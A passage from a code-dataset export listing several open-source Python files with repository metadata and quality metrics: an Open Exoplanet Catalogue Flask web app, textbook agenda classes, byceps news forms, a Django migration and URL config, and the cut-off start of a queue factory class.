hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
05ae01aac492c81e8d3573584782d2cd17b9fff0 | 16,671 | py | Python | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 19 | 2015-02-07T14:01:16.000Z | 2021-11-12T23:41:20.000Z | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 14 | 2015-01-29T23:23:07.000Z | 2021-01-08T00:59:00.000Z | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 17 | 2015-04-28T03:23:08.000Z | 2022-02-22T07:19:33.000Z | #import xml.etree.ElementTree as ET
import lxml.etree as ET
import glob
import os
import time
import urllib
import difflib
import copy
import json
import visualizations
import oec_filters
import datetime
import oec_fields
from bson.objectid import ObjectId
from functools import wraps
#import oec_plots
from numberformat import renderFloat, renderText, notAvailableString
from flask import Flask, abort, render_template, send_from_directory, request, redirect, Response, make_response
#from flask.ext.pymongo import PyMongo
import threading
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
with open(APP_ROOT+"/recaptcha.txt") as f: # read in secret from file.
content = f.readlines()
captchasecret = "".join(content).strip()
with open(APP_ROOT+"/adminpassword.txt") as f: # read in secret from file.
content = f.readlines()
adminpassword = "".join(content).strip()
class MyOEC:
OEC_PATH = APP_ROOT+"/open_exoplanet_catalogue/"
OEC_META_PATH = APP_ROOT+"/oec_meta/"
def __init__(self):
print "Parsing OEC ..."
self.fullxml = "<systems>\n"
self.planets = []
self.systems = []
self.planetXmlPairs = {}
self.planetnames = {}
# Loop over all files and create new data
for filename in glob.glob(self.OEC_PATH + "systems/*.xml"):
# Open file
f = open(filename, 'rt')
xml = f.read()
f.close()
self.fullxml+=xml
filename = filename[len(self.OEC_PATH):]
# Try to parse file
root = ET.fromstring(xml)
self.systems.append(root)
pstars = root.findall("./star")
for p in root.findall(".//planet"):
star = None
parent = p.getparent()
if parent.tag=="star":
star = parent
xmlPair = (root,p,star,filename)
self.planets.append(xmlPair)
name = p.find("./name").text
self.planetXmlPairs[name] = xmlPair
for n in p.findall("./name"):
self.planetnames[n.text] = name
self.fullxml += "</systems>\n"
print "Parsing OEC META ..."
with open(self.OEC_META_PATH+"statistics.xml", 'rt') as f:
self.oec_meta_statistics = ET.parse(f).getroot()
print "Parsing done."
class FlaskApp(Flask):
def __init__(self, *args, **kwargs):
super(FlaskApp, self).__init__(*args, **kwargs)
self.oec = self.getOEC()
def getOEC(self):
mydata = threading.local()
if not hasattr(mydata, "oec"):
mydata.oec = MyOEC()
return mydata.oec
app = FlaskApp(__name__)
#try:
# mongo = PyMongo(app)
#except:
# print("Mongo DB not correctly initialized.")
mongo = None
def isList(value):
return isinstance(value, list)
def getFirst(value):
if isList(value):
return value[0]
return value
app.jinja_env.filters['islist'] = isList
app.jinja_env.filters['getFirst'] = getFirst
#################
@app.route('/system.html')
@app.route('/search/')
def page_planet_redirect():
oec = app.oec
planetname = request.args.get("id")
if planetname not in oec.planetXmlPairs:
if planetname in oec.planetnames:
planetname = oec.planetnames[planetname]
else:
abort(404)
return redirect("planet/"+planetname, 301)
#################
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
return username == 'admin' and password == adminpassword
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
@app.route('/plot/<plotname>/')
@app.route('/plot/<plotname>')
@app.route('/plot/<plotname>.svg')
def page_plot(plotname):
# oec = app.oec
# if plotname=="discoveryyear":
# return Response(oec_plots.discoveryyear(oec.oec_meta_statistics), mimetype='image/svg+xml')
# if plotname=="skypositions":
# return Response(oec_plots.skypositions(oec.systems), mimetype='image/svg+xml')
abort(404)
@app.route('/')
@app.route('/index.html')
def page_main():
oec = app.oec
contributors = []
for c in oec.oec_meta_statistics.findall(".//contributor"):
contributors.append(c.text)
commitdate = datetime.datetime.fromtimestamp(int(oec.oec_meta_statistics.find(".//lastcommittimestamp").text))
return render_template("index.html",
numplanets=len(oec.planets),
numsystems=int(oec.oec_meta_statistics.find("./systems").text),
numconfirmedplanets=int(oec.oec_meta_statistics.find("./confirmedplanets").text),
numbinaries=int(oec.oec_meta_statistics.find("./binaries").text),
lastupdate=commitdate.strftime("%c"),
numcommits=int(oec.oec_meta_statistics.find("./commits").text),
contributors=contributors,
)
@app.route('/kiosk/')
def page_kiosk():
oec = app.oec
commitdate = datetime.datetime.fromtimestamp(int(oec.oec_meta_statistics.find(".//lastcommittimestamp").text))
data_x = ""
data_y = ""
sum_y = 0
for y in oec.oec_meta_statistics.find("./discoveryyear"):
data_x += y.tag[1:] + ","
sum_y+=int(y.text)
data_y += "%d," % sum_y
return render_template("kiosk.html",
numconfirmedplanets=int(oec.oec_meta_statistics.find("./confirmedplanets").text),
lastupdate=commitdate.strftime("%A, %-d %B %Y, %X"),
loaddate=time.strftime("%A, %-d %B %Y, %X"),
discoverynumbers= data_y[:-1],
discoveryyears= data_x[:-1],
)
@app.route('/systems/',methods=["POST","GET"])
def page_systems():
oec = app.oec
p = []
debugtxt = ""
fields = ["namelink"]
filters = []
if "filters" in request.args:
listfilters = request.args.getlist("filters")
for filter in listfilters:
if filter in oec_filters.titles:
filters.append(filter)
if "fields" in request.args:
listfields = request.args.getlist("fields")
for field in listfields:
if field in oec_fields.titles and field!="namelink":
fields.append(field)
else:
fields += ["mass","radius","massEarth","radiusEarth","numberofplanets","numberofstars"]
lastfilename = ""
tablecolour = 0
for xmlPair in oec.planets:
if oec_filters.isFiltered(xmlPair,filters):
continue
system,planet,star,filename = xmlPair
if lastfilename!=filename:
lastfilename = filename
tablecolour = not tablecolour
d = {}
d["fields"] = [tablecolour]
for field in fields:
d["fields"].append(oec_fields.render(xmlPair,field,editbutton=False))
p.append(d)
return render_template("systems.html",
columns=[oec_fields.titles[field] for field in fields],
planets=p,
available_fields=oec_fields.titles,
available_filters=oec_filters.titles,
fields=fields,
filters=filters,
debugtxt=debugtxt)
@app.route('/webgl.html')
def page_webgl():
return render_template("webgl.html")
@app.route('/planet/<planetname>')
@app.route('/planet/<planetname>/')
@app.route('/system/<planetname>/')
def page_planet(planetname):
oec = app.oec
try:
xmlPair = oec.planetXmlPairs[planetname]
except:
abort(404)
system,planet,star,filename = xmlPair
planets=system.findall(".//planet")
stars=system.findall(".//star")
systemtable = []
for row in ["systemname","systemalternativenames","rightascension","declination","distance","distancelightyears","numberofstars","numberofplanets"]:
systemtable.append((oec_fields.titles[row],oec_fields.render(xmlPair,row)))
planettable = []
planettablefields = []
for row in ["name","alternativenames","description","lists","mass","massEarth","radius","radiusEarth","period","semimajoraxis","eccentricity","temperature","discoverymethod","discoveryyear","lastupdate"]:
planettablefields.append(oec_fields.titles[row])
rowdata = []
for p in planets:
rowdata.append(oec_fields.render((system,p,star,filename),row))
if len(set(rowdata)) <= 1 and row!="name" and rowdata[0]!=notAvailableString: # all fields identical:
rowdata = rowdata[0]
planettable.append(rowdata)
startable = []
startablefields = []
for row in ["starname","staralternativenames","starmass","starradius","starage","starmetallicity","startemperature","starspectraltype","starmagV"]:
startablefields.append(oec_fields.titles[row])
rowdata = []
if len(stars)>0: # free floating planets
for s in stars:
rowdata.append(oec_fields.render((system,planet,s,filename),row))
if len(set(rowdata)) <= 1 and row!="starname" and rowdata[0]!=notAvailableString: # all fields identical:
rowdata = rowdata[0]
startable.append(rowdata)
references = []
contributors = []
try:
with open(oec.OEC_META_PATH+filename, 'rt') as f:
root = ET.parse(f).getroot()
for l in root.findall(".//link"):
references.append(l.text)
for c in root.findall(".//contributor"):
contributors.append((c.attrib["commits"],c.attrib["email"],c.text))
except IOError:
pass
vizsize = visualizations.size(xmlPair)
vizhabitable = visualizations.habitable(xmlPair)
vizarchitecture = visualizations.textArchitecture(system)
return render_template("planet.html",
system=system,
planet=planet,
filename=filename,
planetname=planetname,
vizsize=vizsize,
vizhabitable=vizhabitable,
architecture=vizarchitecture,
systemname=oec_fields.render(xmlPair,"systemname"),
systemtable=systemtable,
image=(oec_fields.render(xmlPair,"image"),oec_fields.render(xmlPair,"imagedescription")),
planettablefields=planettablefields,
planettable=planettable,
startablefields=startablefields,
startable=startable,
references=references,
contributors=contributors,
systemcategory=oec_fields.render(xmlPair,"systemcategory"),
)
def getAttribText(o,a):
if a in o.attrib:
return o.attrib[a]
else:
return ""
# form disabled
#@app.route('/edit/form/<path:fullpath>')
def page_planet_edit_form(fullpath):
path = fullpath.split(".xml/")
if len(path)!=2:
abort(404)
urlfilename = path[0]+".xml"
xmlpath = path[1]
oec = app.oec
for key in oec.planetXmlPairs:
system,planet,star,filename = oec.planetXmlPairs[key]
if filename==urlfilename:
break
if filename!=urlfilename:
abort(404)
planetname = planet.find("./name").text
o = system.find(xmlpath)
title = ""
tag = o.tag
if o.getparent().tag == "star":
tag = "star"+tag
if tag in oec_fields.titles:
title = oec_fields.titles[tag]
if tag in ["description"]:
# Text
return render_template("edit_form_text.html",
title=title,
value=o.text,
filename=filename,
xmlpath=xmlpath,
)
# Default float
return render_template("edit_form_float.html",
title=title,
value=o.text,
filename=filename,
errorminus=getAttribText(o,"errorminus"),
errorplus=getAttribText(o,"errorplus"),
lowerlimit=getAttribText(o,"lowerlimit"),
upperlimit=getAttribText(o,"upperlimit"),
xmlpath=xmlpath,
)
# Nicely indents the XML output
def indent(elem, level=0):
i = "\n" + level * "\t"
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + "\t"
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
# form disabled
#@app.route('/edit/submit/<path:fullpath>',methods=["POST"])
def page_planet_edit_submit(fullpath):
path = fullpath.split(".xml/")
if len(path)!=2:
abort(404)
urlfilename = path[0]+".xml"
xmlpath = path[1]
if "g-recaptcha-response" not in request.form:
return json.dumps({'success': False, 'message': "Captcha failed. Please try again."})
url = "https://www.google.com/recaptcha/api/siteverify?secret="+captchasecret+"&response="+request.form["g-recaptcha-response"]+""
captcharesponse = json.load(urllib.urlopen(url))
if captcharesponse["success"]!=True:
return json.dumps({'success': False, 'message': "Captcha failed. Please try again."})
if len(request.form["name"])<2:
return json.dumps({'success': False, 'message': "Please enter your name."})
if len(request.form["paper"])<10:
return json.dumps({'success': False, 'message': "Please enter a valid link to a scientific publication."})
oec = app.oec
for key in oec.planetXmlPairs:
system,planet,star,filename = oec.planetXmlPairs[key]
if filename==urlfilename:
break
if filename!=urlfilename:
return json.dumps({'success': False, 'message': "Cannot find system."})
new_system = copy.deepcopy(system)
o = new_system.find(xmlpath)
tag = o.tag
if o.getparent().tag == "star":
tag = "star"+tag
if tag in ["desription"]:
# Text
if "value" in request.form:
o.text = request.form["value"]
else:
# Float
attribs = ["errorplus", "errorminus","upperlimit", "lowerlimit"]
for attrib in attribs:
if attrib in request.form:
newv = request.form[attrib]
if len(newv)==0:
if attrib in o.attrib:
o.attrib.pop(attrib)
else:
o.attrib[attrib] = newv
if "value" in request.form:
o.text = request.form["value"]
indent(new_system)
diff = difflib.unified_diff(
ET.tostring(system, encoding="UTF-8", xml_declaration=False).strip().split("\n"),
ET.tostring(new_system, encoding="UTF-8", xml_declaration=False).strip().split("\n"),
fromfile=filename,
tofile=filename,
lineterm='')
# Just for testing. Needs a proper backend.
d = {}
d["patch"] = '\n'.join(diff)
d["paper"] = request.form["paper"]
d["name"] = request.form["name"]
d["ip"] = request.remote_addr
d["date"] = time.time()
mongo.db.edits.insert(d)
return json.dumps({'success': True, 'message': "Thanks for your contribution. We're checking your commit now."})
@app.route('/correlations/')
@app.route('/correlations.html')
def page_correlations():
return render_template("correlations.html")
@app.route('/histogram/')
@app.route('/histogram.html')
def page_histogram():
return render_template("histogram.html",)
@app.route('/systems.xml')
def page_systems_xml():
oec = app.oec
return oec.fullxml
@app.route('/robots.txt')
def page_robots_txt():
return "User-agent: *\nDisallow:\n"
@app.route('/edits/',methods=["POST","GET"])
@requires_auth
def page_edits():
if "approve" in request.form:
edit = mongo.db.edits.find_one( {"_id": ObjectId(request.form["approve"])} )
response = make_response(edit["patch"])
response.headers["Content-Disposition"] = "attachment; filename=oec.patch"
response.headers["Content-Type"] = "application/patch"
return response
else:
if "delete" in request.form:
print mongo.db.edits.remove( {"_id": ObjectId(request.form["delete"])} )
edits = mongo.db.edits.find()
return render_template("edits.html",
edits=edits,
)
if __name__ == '__main__':
app.run(debug=True,threaded=True)
| 33.408818 | 208 | 0.619399 | 1,912 | 16,671 | 5.317469 | 0.208682 | 0.017311 | 0.018393 | 0.019671 | 0.23773 | 0.201731 | 0.169568 | 0.169568 | 0.146946 | 0.127471 | 0 | 0.004268 | 0.241017 | 16,671 | 498 | 209 | 33.475904 | 0.799257 | 0.051407 | 0 | 0.209877 | 0 | 0 | 0.148917 | 0.008586 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014815 | 0.041975 | null | null | 0.009877 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05afbc147cbff79e1f9b44cd06a8934031b41d20 | 2,339 | py | Python | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2017
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Primeira reimpressão - Outubro/2011
# Segunda reimpressão - Novembro/2012
# Terceira reimpressão - Agosto/2013
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Primeira reimpressão - Segunda edição - Maio/2015
# Segunda reimpressão - Segunda edição - Janeiro/2016
# Terceira reimpressão - Segunda edição - Junho/2016
# Quarta reimpressão - Segunda edição - Março/2017
#
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem\capitulo 11\11.29 - Novas classes - listagem parcial.py
##############################################################################
class DBListaÚnica(ListaÚnica):
def __init__(self, elem_class):
super().__init__(elem_class)
self.apagados = []
def remove(self, elem):
if elem.id is not None:
self.apagados.append(elem.id)
super().remove(elem)
def limpa(self):
self.apagados = []
class DBNome(Nome):
def __init__(self, nome, id_=None):
super().__init__(nome)
self.id = id_
class DBTipoTelefone(TipoTelefone):
def __init__(self, id_, tipo):
super().__init__(tipo)
self.id = id_
class DBTelefone(Telefone):
def __init__(self, número, tipo=None, id_=None, id_nome=None):
super().__init__(número, tipo)
self.id = id_
self.id_nome = id_nome
class DBTelefones(DBListaÚnica):
def __init__(self):
super().__init__(DBTelefone)
class DBTiposTelefone(ListaÚnica):
def __init__(self):
super().__init__(DBTipoTelefone)
class DBDadoAgenda:
def __init__(self, nome):
self.nome = nome
self.telefones = DBTelefones()
@property
def nome(self):
return self.__nome
@nome.setter
def nome(self, valor):
if type(valor)!=DBNome:
raise TypeError("nome deve ser uma instância da classe DBNome")
self.__nome = valor
def pesquisaTelefone(self, telefone):
posição = self.telefones.pesquisa(DBTelefone(telefone))
if posição == -1:
return None
else:
return self.telefones[posição]
| 29.987179 | 78 | 0.614793 | 263 | 2,339 | 5.212928 | 0.39924 | 0.03574 | 0.056163 | 0.018964 | 0.029176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042123 | 0.218469 | 2,339 | 77 | 79 | 30.376623 | 0.707877 | 0.273194 | 0 | 0.148936 | 0 | 0 | 0.028815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.255319 | false | 0 | 0 | 0.021277 | 0.468085 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05b54bb3fe5dc682880a95d84c390e21f038de58 | 2,040 | py | Python | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 33 | 2018-01-16T02:04:51.000Z | 2022-03-22T22:57:29.000Z | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 7 | 2019-06-16T22:02:03.000Z | 2021-10-02T13:45:31.000Z | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 14 | 2019-06-01T21:39:24.000Z | 2022-03-14T17:56:43.000Z | """
byceps.blueprints.admin.news.forms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
import re
from flask_babel import lazy_gettext
from wtforms import FileField, StringField, TextAreaField
from wtforms.fields.html5 import DateField, TimeField
from wtforms.validators import InputRequired, Length, Optional, Regexp
from ....util.l10n import LocalizedForm
SLUG_REGEX = re.compile('^[a-z0-9-]+$')
class ChannelCreateForm(LocalizedForm):
channel_id = StringField(
lazy_gettext('ID'), validators=[InputRequired(), Length(min=1, max=40)]
)
url_prefix = StringField(
lazy_gettext('URL prefix'), [InputRequired(), Length(max=80)]
)
class _ImageFormBase(LocalizedForm):
alt_text = StringField(lazy_gettext('Alternative text'), [InputRequired()])
caption = StringField(lazy_gettext('Caption'), [Optional()])
attribution = StringField(lazy_gettext('Source'), [Optional()])
class ImageCreateForm(_ImageFormBase):
image = FileField(lazy_gettext('Image file'), [InputRequired()])
class ImageUpdateForm(_ImageFormBase):
pass
class ItemCreateForm(LocalizedForm):
slug = StringField(
lazy_gettext('Slug'),
[
InputRequired(),
Length(max=100),
Regexp(
SLUG_REGEX,
message=lazy_gettext(
'Lowercase letters, digits, and dash are allowed.'
),
),
],
)
title = StringField(
lazy_gettext('Title'), [InputRequired(), Length(max=100)]
)
body = TextAreaField(lazy_gettext('Text'), [InputRequired()])
image_url_path = StringField(
lazy_gettext('Image URL path'), [Optional(), Length(max=100)]
)
class ItemUpdateForm(ItemCreateForm):
pass
class ItemPublishLaterForm(LocalizedForm):
publish_on = DateField(lazy_gettext('Date'), [InputRequired()])
publish_at = TimeField(lazy_gettext('Time'), [InputRequired()])
| 27.2 | 79 | 0.657843 | 197 | 2,040 | 6.675127 | 0.446701 | 0.11711 | 0.13384 | 0.038023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016605 | 0.202941 | 2,040 | 74 | 80 | 27.567568 | 0.792128 | 0.082353 | 0 | 0.083333 | 0 | 0 | 0.078326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.041667 | 0.125 | 0 | 0.520833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05b96ce631c9290e2b36676226eaef02df761e51 | 824 | py | Python | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | null | null | null | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | 38 | 2015-10-21T19:10:36.000Z | 2015-12-18T11:57:12.000Z | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9b1 on 2015-11-12 03:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('arcfire', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='place',
name='location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='places_primary', to='arcfire.Location'),
),
migrations.AlterField(
model_name='person',
name='gender',
field=models.CharField(blank=True, choices=[('f', 'Female'), ('m', 'Male'), ('none', 'None'), ('other', 'Other')], max_length=10),
),
]
| 30.518519 | 158 | 0.612864 | 91 | 824 | 5.417582 | 0.659341 | 0.048682 | 0.056795 | 0.089249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03481 | 0.23301 | 824 | 26 | 159 | 31.692308 | 0.745253 | 0.081311 | 0 | 0.105263 | 1 | 0 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05b9dda30fd0fb12c0f19ff7b3c4cc0f6dac7be0 | 630 | py | Python | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from django.conf.urls import url
from . import views
from django.views.generic.base import RedirectView
from rest_framework.urlpatterns import format_suffix_patterns
app_name = 'userprofile'
urlpatterns = [
path('profile/<int:pk>/', views.OtherUserDetail.as_view()), #includes favorites, and friends' recipes for the feed
path('profile/<int:pk>/favorites/', views.UserFavoriteList.as_view()),
path('profile/<int:pk>/friends/', views. UserFriendsList.as_view()),
path('profile/search/<str:query>/', views. UserSearchList.as_view())
]
urlpatterns = format_suffix_patterns(urlpatterns) | 39.375 | 118 | 0.765079 | 81 | 630 | 5.82716 | 0.493827 | 0.09322 | 0.088983 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104762 | 630 | 16 | 119 | 39.375 | 0.836879 | 0.084127 | 0 | 0 | 0 | 0 | 0.185442 | 0.136915 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
05bbade2f2ec37295e10e5d0ed3d9a8803d32394 | 693 | py | Python | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | from bbpyp.common.exception.bbpyp_value_error import BbpypValueError
from bbpyp.common.model.queue_type import QueueType
class QueueFactory:
def __init__(self, fifo_queue_factory, sequence_queue_factory):
self._fifo_queue_factory = fifo_queue_factory
self._sequence_queue_factory = sequence_queue_factory
def __call__(self, queue_type):
